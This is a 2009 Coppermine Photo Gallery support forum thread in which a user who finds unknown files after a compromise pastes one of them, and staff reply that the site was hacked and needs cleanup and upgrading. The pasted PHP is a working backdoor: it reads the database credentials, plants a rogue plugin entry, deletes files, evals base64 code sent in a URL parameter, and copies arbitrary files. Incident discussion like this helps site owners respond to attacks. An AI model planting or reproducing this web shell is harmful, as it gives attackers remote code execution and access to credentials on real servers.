config.inc.php to txt - Hacking attempt? config.inc.php to txt - Hacking attempt?
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

config.inc.php to txt - Hacking attempt?

Started by FM86, February 21, 2009, 06:03:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

FM86

Hi guys!

I just realised something shoking:
I found out in the copper/album directory a txt file which is the exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are other 2 unknown files in this directory. One of them is a php files which contains the code listed at the end of this topic.
Do you have any idea about what this it?

Thank you in advance!

<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="b269fcfd....23ec7fad79df17";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>

François Keller

Your galery was hacked. Delete the unknown files (have a look to the userpics folder too) and update to the latest cpg version (cpg1.4.20)
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Joachim Müller

Quote from: François Keller on February 21, 2009, 06:05:48 PM
Delete the unknown files (have a look to the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what?"